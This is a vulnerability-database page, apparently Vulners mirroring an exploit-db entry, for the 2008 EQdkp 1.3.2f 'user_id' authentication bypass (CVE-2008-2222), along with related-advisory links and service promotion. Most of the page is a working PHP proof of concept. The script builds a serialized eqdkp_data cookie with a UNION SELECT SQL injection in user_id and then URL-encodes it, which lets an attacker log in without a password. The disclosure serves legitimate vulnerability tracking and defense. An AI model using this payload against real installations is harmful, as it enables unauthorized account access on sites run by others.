Lucene search
+L

EQdkp 1.3.2f - 'user_id' Authentication Bypass

🗓️ 13 May 2008 00:00:00Reported by vortfuType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

EQDKP 1.3.2f 'user_id' Authentication Bypass Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2222
13 May 200800:00
circl
cve
CVE
CVE-2008-2222
14 May 200818:00
cve
cvelist
Cvelist
CVE-2008-2222
14 May 200818:00
cvelist
euvd
EUVD
EUVD-2008-2219
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-2222
14 May 200818:20
nvd
prion
Prion
Sql injection
14 May 200818:20
prion
<?php
   // EQDKP 1.3.2f Authentication Bypass (PoC)
   // [email protected]

   $data['auto_login_id'] = 'x';
   $data['user_id']       = "1' " .
                            "UNION SELECT " .
                               "1, " .         // * user_id
                               "'a', " .       // username
                               "'x', " .       // * user_password
                               "'', " .        // user_email
                               "1, " .         // user_alimit
                               "1, " .         // user_elimit
                               "1, " .         // user_ilimit
                               "1, " .         // user_nlimit
                               "1, " .         // user_rlimit
                               "1, " .         // user_style
                               "'english', " . // user_lang
                               "NULL, " .      // user_key
                               "1, " .         // user_lastvisit
                               "NULL, " .      // user_lastpage
                               "1, " .         // * user_active
                               "NULL, " .      // user_newpassword
                               "NULL " .       // session_current
                            "ORDER BY " .
                               "username ASC" .
                            "/*";

   $cookie = serialize($data);
   echo "eqdkp_data\n\n";

   for($i = 0; $i < strlen($cookie); $i++)
      echo '%' . bin2hex($cookie[$i]);

   echo "\n\n";
?>

# milw0rm.com [2008-05-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01058
37